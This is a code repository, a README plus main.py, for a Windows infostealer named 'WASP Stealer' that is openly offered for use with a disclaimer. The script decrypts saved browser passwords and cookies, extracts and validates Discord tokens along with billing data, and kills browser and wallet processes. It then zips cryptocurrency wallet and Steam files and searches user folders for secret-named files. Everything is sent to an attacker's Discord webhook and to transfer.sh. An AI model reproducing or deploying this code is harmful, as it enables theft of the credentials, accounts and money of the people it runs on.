├── README.md
└── main.py
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 🐝 WASP Stealer (Discord Token Grabber) 🐝
3 |
4 | They sell this for 30$💀
5 |
6 |
7 | 
8 |
9 |
10 |
11 | ## 〢 Content
12 |
13 | - [📁 Setting up](#setup)
14 | - [⚔️ Features](#features)
15 | - [📸 Screenshots](#screenshot)
16 | - [⚠️ Note](#note)
17 |
18 | ### 〢 Setting Up
19 |
20 | > Put ur webhook at hook = ""
21 | > and run main.py
22 |
23 |
24 |
25 | ---
26 |
27 | ### 〢 Features
28 |
29 | #### Stealer
30 |
31 | > FUD (Fully Undetectable)
32 |
33 | > Password / Cookies
34 | - Steal Saved Passwords
35 | - Steal Brower Cookies
36 |
37 | > Wallet Stealer
38 | - Steal Metamask wallets
39 | - Steal Exodus Wallet
40 | - Steal Atomic Wallet
41 |
42 | > Discord
43 | - Steal Discord Tokens from browsers
44 | - Steal Discord Token from discord, discordcanary, discordPTBa
45 |
46 | > Gaming
47 | - Steal Steam Launcher accounts
48 | - Steal Nation Glory Launcher accounts
49 |
50 | > File Stealer
51 | - Search User PC for Passwords, 2Fa codes, tokens, wallets...
52 | - Browsers: Opera, Chrome, Brave, Yandex, Edge
53 |
54 | ### 〢 Screenshots
55 |
56 |
57 |
58 | 
59 |
60 |
61 |
62 | ### 〢 Note
63 |
64 | I am not responsible for any damages this software may cause. This was made for personal education.
65 |
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | import os
2 | import threading
3 | from sys import executable
4 | from sqlite3 import connect as sql_connect
5 | import re
6 | from base64 import b64decode
7 | from json import loads as json_loads, load
8 | from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
9 | from urllib.request import Request, urlopen
10 | from json import loads, dumps
11 | import time
12 | import shutil
13 | from zipfile import ZipFile
14 | import random
15 | import re
16 | import subprocess
17 |
18 | # THIS IS 1.1.4 VERSION!
19 | #
20 | #
21 |
22 |
23 | hook = ""
24 | DETECTED = False
25 |
26 |
27 | def getip():
28 | ip = "None"
29 | try:
30 | ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
31 | except:
32 | pass
33 | return ip
34 |
35 | requirements = [
36 | ["requests", "requests"],
37 | ["Crypto.Cipher", "pycryptodome"]
38 | ]
39 | for modl in requirements:
40 | try: __import__(modl[0])
41 | except:
42 | subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
43 | time.sleep(3)
44 |
45 | import requests
46 | from Crypto.Cipher import AES
47 |
48 | local = os.getenv('LOCALAPPDATA')
49 | roaming = os.getenv('APPDATA')
50 | temp = os.getenv("TEMP")
51 | Threadlist = []
52 |
53 |
54 | class DATA_BLOB(Structure):
55 | _fields_ = [
56 | ('cbData', wintypes.DWORD),
57 | ('pbData', POINTER(c_char))
58 | ]
59 |
60 | def GetData(blob_out):
61 | cbData = int(blob_out.cbData)
62 | pbData = blob_out.pbData
63 | buffer = c_buffer(cbData)
64 | cdll.msvcrt.memcpy(buffer, pbData, cbData)
65 | windll.kernel32.LocalFree(pbData)
66 | return buffer.raw
67 |
68 | def CryptUnprotectData(encrypted_bytes, entropy=b''):
69 | buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
70 | buffer_entropy = c_buffer(entropy, len(entropy))
71 | blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
72 | blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
73 | blob_out = DATA_BLOB()
74 |
75 | if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
76 | return GetData(blob_out)
77 |
78 | def DecryptValue(buff, master_key=None):
79 | starts = buff.decode(encoding='utf8', errors='ignore')[:3]
80 | if starts == 'v10' or starts == 'v11':
81 | iv = buff[3:15]
82 | payload = buff[15:]
83 | cipher = AES.new(master_key, AES.MODE_GCM, iv)
84 | decrypted_pass = cipher.decrypt(payload)
85 | decrypted_pass = decrypted_pass[:-16].decode()
86 | return decrypted_pass
87 |
88 | def LoadRequests(methode, url, data='', files='', headers=''):
89 | for i in range(8): # max trys
90 | try:
91 | if methode == 'POST':
92 | if data != '':
93 | r = requests.post(url, data=data)
94 | if r.status_code == 200:
95 | return r
96 | elif files != '':
97 | r = requests.post(url, files=files)
98 | if r.status_code == 200 or r.status_code == 413: # 413 = DATA TO BIG
99 | return r
100 | except:
101 | pass
102 |
103 | def LoadUrlib(hook, data='', files='', headers=''):
104 | for i in range(8):
105 | try:
106 | if headers != '':
107 | r = urlopen(Request(hook, data=data, headers=headers))
108 | return r
109 | else:
110 | r = urlopen(Request(hook, data=data))
111 | return r
112 | except:
113 | pass
114 |
115 |
116 | def Trust(Cookies):
117 | # simple Trust Factor system
118 | global DETECTED
119 | data = str(Cookies)
120 | tim = re.findall(".google.com", data)
121 | # print(len(tim))
122 | if len(tim) < -1:
123 | DETECTED = True
124 | return DETECTED
125 | else:
126 | DETECTED = False
127 | return DETECTED
128 |
129 | def GetBilling(token):
130 | headers = {
131 | "Authorization": token,
132 | "Content-Type": "application/json",
133 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
134 | }
135 | try:
136 | billingjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
137 | except:
138 | return False
139 |
140 | if billingjson == []: return " -"
141 |
142 | billing = ""
143 | for methode in billingjson:
144 | if methode["invalid"] == False:
145 | if methode["type"] == 1:
146 | billing += ":credit_card:"
147 | elif methode["type"] == 2:
148 | billing += ":parking: "
149 |
150 | return billing
151 |
152 |
153 | def GetBadge(flags):
154 | if flags == 0: return ''
155 |
156 | OwnedBadges = ''
157 | badgeList = [
158 | {"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
159 | {"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
160 | {"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
161 | {"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
162 | {"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
163 | {"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
164 | {"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
165 | {"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
166 | {"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
167 | {"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
168 |
169 | ]
170 | for badge in badgeList:
171 | if flags // badge["Value"] != 0:
172 | OwnedBadges += badge["Emoji"]
173 | flags = flags % badge["Value"]
174 |
175 | return OwnedBadges
176 |
177 | def GetTokenInfo(token):
178 | headers = {
179 | "Authorization": token,
180 | "Content-Type": "application/json",
181 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
182 | }
183 |
184 | userjson = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
185 | username = userjson["username"]
186 | hashtag = userjson["discriminator"]
187 | email = userjson["email"]
188 | idd = userjson["id"]
189 | pfp = userjson["avatar"]
190 | flags = userjson["public_flags"]
191 | nitro = ""
192 | phone = "-"
193 |
194 | if "premium_type" in userjson:
195 | nitrot = userjson["premium_type"]
196 | if nitrot == 1:
197 | nitro = "<:classic:896119171019067423> "
198 | elif nitrot == 2:
199 | nitro = " <:classic:896119171019067423> "
200 | if "phone" in userjson: phone = f'`{userjson["phone"]}`'
201 |
202 | return username, hashtag, email, idd, pfp, flags, nitro, phone
203 |
204 | def checkToken(token):
205 | headers = {
206 | "Authorization": token,
207 | "Content-Type": "application/json",
208 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
209 | }
210 | try:
211 | urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
212 | return True
213 | except:
214 | return False
215 |
216 |
217 | def uploadToken(token, path):
218 | global hook
219 | headers = {
220 | "Content-Type": "application/json",
221 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
222 | }
223 | username, hashtag, email, idd, pfp, flags, nitro, phone = GetTokenInfo(token)
224 |
225 | if pfp == None:
226 | pfp = "https://cdn.discordapp.com/attachments/971769033496076348/1018558042402476143/manny_in_floatie.jpg"
227 | else:
228 | pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
229 |
230 | billing = GetBilling(token)
231 | badge = GetBadge(flags)
232 | if not billing:
233 | badge, phone, billing = "🔒", "🔒", "🔒"
234 | if nitro == '' and badge == '': nitro = " -"
235 |
236 | data = {
237 | "content": f'Found in `{path}`',
238 | "embeds": [
239 | {
240 | "color": 14406413,
241 | "fields": [
242 | {
243 | "name": ":rocket: Token:",
244 | "value": f"`{token}`\n[Click to copy](https://superfurrycdn.nl/copy/{token})"
245 | },
246 | {
247 | "name": ":envelope: Email:",
248 | "value": f"`{email}`",
249 | "inline": True
250 | },
251 | {
252 | "name": ":mobile_phone: Phone:",
253 | "value": f"{phone}",
254 | "inline": True
255 | },
256 | {
257 | "name": ":globe_with_meridians: IP:",
258 | "value": f"`{getip()}`",
259 | "inline": True
260 | },
261 | {
262 | "name": ":beginner: Badges:",
263 | "value": f"{nitro}{badge}",
264 | "inline": True
265 | },
266 | {
267 | "name": ":credit_card: Billing:",
268 | "value": f"{billing}",
269 | "inline": True
270 | }
271 | ],
272 | "author": {
273 | "name": f"{username}#{hashtag} ({idd})",
274 | "icon_url": f"{pfp}"
275 | },
276 | "footer": {
277 | "text": "@ACEE STEALER",
278 | "icon_url": "https://cdn.discordapp.com/attachments/971769033496076348/1018558042402476143/manny_in_floatie.jpg"
279 | },
280 | "thumbnail": {
281 | "url": f"{pfp}"
282 | }
283 | }
284 | ],
285 | "avatar_url": "https://cdn.discordapp.com/attachments/971769033496076348/1018558042402476143/manny_in_floatie.jpg",
286 | "username": "ACEE Stealer",
287 | "attachments": []
288 | }
289 | # urlopen(Request(hook, data=dumps(data).encode(), headers=headers))
290 | LoadUrlib(hook, data=dumps(data).encode(), headers=headers)
291 |
292 | def Reformat(listt):
293 | e = re.findall("(\w+[a-z])",listt)
294 | while "https" in e: e.remove("https")
295 | while "com" in e: e.remove("com")
296 | while "net" in e: e.remove("net")
297 | return list(set(e))
298 |
299 | def upload(name, tk=''):
300 | headers = {
301 | "Content-Type": "application/json",
302 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
303 | }
304 |
305 | if name == "kiwi":
306 | data = {
307 | "content": '',
308 | "embeds": [
309 | {
310 | "color": 14406413,
311 | "fields": [
312 | {
313 | "name": "Interesting files found on user PC:",
314 | "value": tk
315 | }
316 | ],
317 | "author": {
318 | "name": "ACEE | File Stealer"
319 | },
320 | "footer": {
321 | "text": "@ACEE STEALER",
322 | "icon_url": "https://cdn.discordapp.com/attachments/971769033496076348/1018558042402476143/manny_in_floatie.jpg"
323 | }
324 | }
325 | ],
326 | "avatar_url": "https://cdn.discordapp.com/attachments/971769033496076348/1018558042402476143/manny_in_floatie.jpg",
327 | "attachments": []
328 | }
329 | # urlopen(Request(hook, data=dumps(data).encode(), headers=headers))
330 | LoadUrlib(hook, data=dumps(data).encode(), headers=headers)
331 | return
332 |
333 | path = name
334 | files = {'file': open(path, 'rb')}
335 | # print(f"FILE= {files}")
336 |
337 | if "wppassw" in name:
338 |
339 | ra = ' | '.join(da for da in paswWords)
340 |
341 | if len(ra) > 1000:
342 | rrr = Reformat(str(paswWords))
343 | ra = ' | '.join(da for da in rrr)
344 |
345 | data = {
346 | "content": '',
347 | "embeds": [
348 | {
349 | "color": 14406413,
350 | "fields": [
351 | {
352 | "name": "Found:",
353 | "value": ra
354 | }
355 | ],
356 | "author": {
357 | "name": "ACEE | Password Stealer"
358 | },
359 | "footer": {
360 | "text": "@ACEE STEALER",
361 | "icon_url": "https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png"
362 | }
363 | }
364 | ],
365 | "avatar_url": "https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png",
366 | "attachments": []
367 | }
368 | # urlopen(Request(hook, data=dumps(data).encode(), headers=headers))
369 | LoadUrlib(hook, data=dumps(data).encode(), headers=headers)
370 |
371 | if "wpcook" in name:
372 | rb = ' | '.join(da for da in cookiWords)
373 | if len(rb) > 1000:
374 | rrrrr = Reformat(str(cookiWords))
375 | rb = ' | '.join(da for da in rrrrr)
376 |
377 | data = {
378 | "content": '',
379 | "embeds": [
380 | {
381 | "color": 14406413,
382 | "fields": [
383 | {
384 | "name": "Found:",
385 | "value": rb
386 | }
387 | ],
388 | "author": {
389 | "name": "ACEE | Cookies Stealer"
390 | },
391 | "footer": {
392 | "text": "@ACEE STEALER",
393 | "icon_url": "https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png"
394 | }
395 | }
396 | ],
397 | "avatar_url": "https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png",
398 | "attachments": []
399 | }
400 | # urlopen(Request(hook, data=dumps(data).encode(), headers=headers))
401 | LoadUrlib(hook, data=dumps(data).encode(), headers=headers)
402 |
403 | # r = requests.post(hook, files=files)
404 | LoadRequests("POST", hook, files=files)
405 |
406 | def writeforfile(data, name):
407 | path = os.getenv("TEMP") + f"\wp{name}.txt"
408 | with open(path, mode='w', encoding='utf-8') as f:
409 | f.write(f"<--ACEE STEALER ON TOP-->\n\n")
410 | for line in data:
411 | if line[0] != '':
412 | f.write(f"{line}\n")
413 |
414 | Tokens = ''
415 | def getToken(path, arg):
416 | if not os.path.exists(path): return
417 |
418 | path += arg
419 | for file in os.listdir(path):
420 | if file.endswith(".log") or file.endswith(".ldb") :
421 | for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
422 | for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
423 | for token in re.findall(regex, line):
424 | global Tokens
425 | if checkToken(token):
426 | if not token in Tokens:
427 | # print(token)
428 | Tokens += token
429 | uploadToken(token, path)
430 |
431 | Passw = []
432 | def getPassw(path, arg):
433 | global Passw
434 | if not os.path.exists(path): return
435 |
436 | pathC = path + arg + "/Login Data"
437 | if os.stat(pathC).st_size == 0: return
438 |
439 | tempfold = temp + "wp" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
440 |
441 | shutil.copy2(pathC, tempfold)
442 | conn = sql_connect(tempfold)
443 | cursor = conn.cursor()
444 | cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
445 | data = cursor.fetchall()
446 | cursor.close()
447 | conn.close()
448 | os.remove(tempfold)
449 |
450 | pathKey = path + "/Local State"
451 | with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
452 | master_key = b64decode(local_state['os_crypt']['encrypted_key'])
453 | master_key = CryptUnprotectData(master_key[5:])
454 |
455 | for row in data:
456 | if row[0] != '':
457 | for wa in keyword:
458 | old = wa
459 | if "https" in wa:
460 | tmp = wa
461 | wa = tmp.split('[')[1].split(']')[0]
462 | if wa in row[0]:
463 | if not old in paswWords: paswWords.append(old)
464 | Passw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {DecryptValue(row[2], master_key)}")
465 | # print([row[0], row[1], DecryptValue(row[2], master_key)])
466 | writeforfile(Passw, 'passw')
467 |
468 | Cookies = []
469 | def getCookie(path, arg):
470 | global Cookies
471 | if not os.path.exists(path): return
472 |
473 | pathC = path + arg + "/Cookies"
474 | if os.stat(pathC).st_size == 0: return
475 |
476 | tempfold = temp + "wp" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
477 |
478 | shutil.copy2(pathC, tempfold)
479 | conn = sql_connect(tempfold)
480 | cursor = conn.cursor()
481 | cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
482 | data = cursor.fetchall()
483 | cursor.close()
484 | conn.close()
485 | os.remove(tempfold)
486 |
487 | pathKey = path + "/Local State"
488 |
489 | with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
490 | master_key = b64decode(local_state['os_crypt']['encrypted_key'])
491 | master_key = CryptUnprotectData(master_key[5:])
492 |
493 | for row in data:
494 | if row[0] != '':
495 | for wa in keyword:
496 | old = wa
497 | if "https" in wa:
498 | tmp = wa
499 | wa = tmp.split('[')[1].split(']')[0]
500 | if wa in row[0]:
501 | if not old in cookiWords: cookiWords.append(old)
502 | Cookies.append(f"H057 K3Y: {row[0]} | N4M3: {row[1]} | V41U3: {DecryptValue(row[2], master_key)}")
503 | # print([row[0], row[1], DecryptValue(row[2], master_key)])
504 | writeforfile(Cookies, 'cook')
505 |
506 | def GetDiscord(path, arg):
507 | if not os.path.exists(f"{path}/Local State"): return
508 |
509 | pathC = path + arg
510 |
511 | pathKey = path + "/Local State"
512 | with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
513 | master_key = b64decode(local_state['os_crypt']['encrypted_key'])
514 | master_key = CryptUnprotectData(master_key[5:])
515 | # print(path, master_key)
516 |
517 | for file in os.listdir(pathC):
518 | # print(path, file)
519 | if file.endswith(".log") or file.endswith(".ldb") :
520 | for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
521 | for token in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
522 | global Tokens
523 | tokenDecoded = DecryptValue(b64decode(token.split('dQw4w9WgXcQ:')[1]), master_key)
524 | if checkToken(tokenDecoded):
525 | if not tokenDecoded in Tokens:
526 | # print(token)
527 | Tokens += tokenDecoded
528 | # writeforfile(Tokens, 'tokens')
529 | uploadToken(tokenDecoded, path)
530 |
531 |
532 | def ZipThings(path, arg, procc):
533 | pathC = path
534 | name = arg
535 | # subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
536 | # os.system(f"taskkill /im {procc} /t /f")
537 |
538 | if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
539 | browser = path.split("\\")[4].split("/")[1].replace(' ', '')
540 | name = f"Metamask_{browser}"
541 | pathC = path + arg
542 |
543 | if not os.path.exists(pathC): return
544 | subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
545 |
546 | if "Wallet" in arg or "NationsGlory" in arg:
547 | browser = path.split("\\")[4].split("/")[1].replace(' ', '')
548 | name = f"{browser}"
549 |
550 | elif "Steam" in arg:
551 | if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
552 | f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
553 | data = f.readlines()
554 | # print(data)
555 | found = False
556 | for l in data:
557 | if 'RememberPassword"\t\t"1"' in l:
558 | found = True
559 | if found == False: return
560 | name = arg
561 |
562 | zf = ZipFile(f"{pathC}/{name}.zip", "w")
563 | for file in os.listdir(pathC):
564 | if not ".zip" in file: zf.write(pathC + "/" + file)
565 | zf.close()
566 |
567 | upload(f'{pathC}/{name}.zip')
568 | os.remove(f"{pathC}/{name}.zip")
569 |
570 |
571 | def GatherAll():
572 | ' Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 > '
573 | browserPaths = [
574 | [f"{roaming}/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
575 | [f"{roaming}/Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
576 | [f"{roaming}/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
577 | [f"{local}/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
578 | [f"{local}/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
579 | [f"{local}/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
580 | [f"{local}/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
581 | [f"{local}/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ]
582 | ]
583 |
584 | discordPaths = [
585 | [f"{roaming}/Discord", "/Local Storage/leveldb"],
586 | [f"{roaming}/Lightcord", "/Local Storage/leveldb"],
587 | [f"{roaming}/discordcanary", "/Local Storage/leveldb"],
588 | [f"{roaming}/discordptb", "/Local Storage/leveldb"],
589 | ]
590 |
591 | PathsToZip = [
592 | [f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
593 | [f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
594 | ["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
595 | [f"{roaming}/NationsGlory/Local Storage/leveldb", "NationsGlory.exe", "NationsGlory"]
596 | ]
597 |
598 | for patt in browserPaths:
599 | a = threading.Thread(target=getToken, args=[patt[0], patt[2]])
600 | a.start()
601 | Threadlist.append(a)
602 | for patt in discordPaths:
603 | a = threading.Thread(target=GetDiscord, args=[patt[0], patt[1]])
604 | a.start()
605 | Threadlist.append(a)
606 |
607 | for patt in browserPaths:
608 | a = threading.Thread(target=getPassw, args=[patt[0], patt[3]])
609 | a.start()
610 | Threadlist.append(a)
611 |
612 | ThCokk = []
613 | for patt in browserPaths:
614 | a = threading.Thread(target=getCookie, args=[patt[0], patt[4]])
615 | a.start()
616 | ThCokk.append(a)
617 |
618 | for thread in ThCokk: thread.join()
619 | DETECTED = Trust(Cookies)
620 | if DETECTED == True: return
621 |
622 | for patt in browserPaths:
623 | threading.Thread(target=ZipThings, args=[patt[0], patt[5], patt[1]]).start()
624 |
625 | for patt in PathsToZip:
626 | threading.Thread(target=ZipThings, args=[patt[0], patt[2], patt[1]]).start()
627 |
628 | for thread in Threadlist:
629 | thread.join()
630 | global upths
631 | upths = []
632 |
633 | for file in ["wppassw.txt", "wpcook.txt"]:
634 | upload(os.getenv("TEMP") + "\\" + file)
635 |
636 | def uploadToAnonfiles(path):
637 | try:
638 | files = { "file": (path, open(path, mode='rb')) }
639 | ...
640 | upload = requests.post("https://transfer.sh/", files=files)
641 | url = upload.text
642 | return url
643 | except:
644 | return False
645 |
646 | def KiwiFolder(pathF, keywords):
647 | global KiwiFiles
648 | maxfilesperdir = 7
649 | i = 0
650 | listOfFile = os.listdir(pathF)
651 | ffound = []
652 | for file in listOfFile:
653 | if not os.path.isfile(pathF + "/" + file): return
654 | i += 1
655 | if i <= maxfilesperdir:
656 | url = uploadToAnonfiles(pathF + "/" + file)
657 | ffound.append([pathF + "/" + file, url])
658 | else:
659 | break
660 | KiwiFiles.append(["folder", pathF + "/", ffound])
661 |
662 | KiwiFiles = []
663 | def KiwiFile(path, keywords):
664 | global KiwiFiles
665 | fifound = []
666 | listOfFile = os.listdir(path)
667 | for file in listOfFile:
668 | for worf in keywords:
669 | if worf in file.lower():
670 | if os.path.isfile(path + "/" + file) and ".txt" in file:
671 | fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
672 | break
673 | if os.path.isdir(path + "/" + file):
674 | target = path + "/" + file
675 | KiwiFolder(target, keywords)
676 | break
677 |
678 | KiwiFiles.append(["folder", path, fifound])
679 |
680 | def Kiwi():
681 | user = temp.split("\AppData")[0]
682 | path2search = [
683 | user + "/Desktop",
684 | user + "/Downloads",
685 | user + "/Documents"
686 | ]
687 |
688 | key_wordsFolder = [
689 | "account",
690 | "acount",
691 | "passw",
692 | "secret"
693 |
694 | ]
695 |
696 | key_wordsFiles = [
697 | "passw",
698 | "mdp",
699 | "motdepasse",
700 | "mot_de_passe",
701 | "login",
702 | "secret",
703 | "account",
704 | "acount",
705 | "paypal",
706 | "banque",
707 | "account",
708 | "metamask",
709 | "wallet",
710 | "crypto",
711 | "exodus",
712 | "discord",
713 | "2fa",
714 | "code",
715 | "memo",
716 | "compte",
717 | "token",
718 | "backup",
719 | "seecret"
720 | ]
721 |
722 | wikith = []
723 | for patt in path2search:
724 | kiwi = threading.Thread(target=KiwiFile, args=[patt, key_wordsFiles]);kiwi.start()
725 | wikith.append(kiwi)
726 | return wikith
727 |
728 |
729 | global keyword, cookiWords, paswWords
730 |
731 | keyword = [
732 | 'mail', '[coinbase](https://coinbase.com)', '[sellix](https://sellix.io)', '[gmail](https://gmail.com)', '[steam](https://steam.com)', '[discord](https://discord.com)', '[riotgames](https://riotgames.com)', '[youtube](https://youtube.com)', '[instagram](https://instagram.com)', '[tiktok](https://tiktok.com)', '[twitter](https://twitter.com)', '[facebook](https://facebook.com)', 'card', '[epicgames](https://epicgames.com)', '[spotify](https://spotify.com)', '[yahoo](https://yahoo.com)', '[roblox](https://roblox.com)', '[twitch](https://twitch.com)', '[minecraft](https://minecraft.net)', 'bank', '[paypal](https://paypal.com)', '[origin](https://origin.com)', '[amazon](https://amazon.com)', '[ebay](https://ebay.com)', '[aliexpress](https://aliexpress.com)', '[playstation](https://playstation.com)', '[hbo](https://hbo.com)', '[xbox](https://xbox.com)', 'buy', 'sell', '[binance](https://binance.com)', '[hotmail](https://hotmail.com)', '[outlook](https://outlook.com)', '[crunchyroll](https://crunchyroll.com)', '[telegram](https://telegram.com)', '[pornhub](https://pornhub.com)', '[disney](https://disney.com)', '[expressvpn](https://expressvpn.com)', 'crypto', '[uber](https://uber.com)', '[netflix](https://netflix.com)'
733 | ]
734 |
735 |
736 | cookiWords = []
737 | paswWords = []
738 |
739 | GatherAll()
740 | DETECTED = Trust(Cookies)
741 |
742 | if not DETECTED:
743 | wikith = Kiwi()
744 |
745 | for thread in wikith: thread.join()
746 | time.sleep(0.2)
747 |
748 | filetext = "\n"
749 | for arg in KiwiFiles:
750 | if len(arg[2]) != 0:
751 | foldpath = arg[1]
752 | foldlist = arg[2]
753 | filetext += f"• {foldpath}\n"
754 |
755 | for ffil in foldlist:
756 | a = ffil[0].split("/")
757 | fileanme = a[len(a)-1]
758 | b = ffil[1]
759 | filetext += f"... [{fileanme}]({b})\n"
760 | filetext += "\n"
761 | upload("kiwi", filetext)
762 |
--------------------------------------------------------------------------------